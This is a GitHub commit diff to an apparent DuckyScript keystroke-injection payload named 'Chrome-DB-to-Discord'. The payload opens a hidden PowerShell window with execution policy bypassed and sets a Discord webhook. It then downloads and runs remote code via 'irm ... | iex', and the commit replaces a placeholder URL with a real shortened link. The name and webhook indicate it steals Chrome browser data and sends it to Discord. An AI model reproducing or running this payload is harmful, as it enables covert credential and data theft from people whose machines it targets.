Update Chrome-DB-to-Discord.txt

This commit is contained in:
egieb
2024-04-11 21:34:43 +00:00
committed by GitHub
parent 763d15660b
commit 624635ddd5

View File

@@ -13,7 +13,7 @@ REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm URL | iex
STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bwchdbdc | iex
ENTER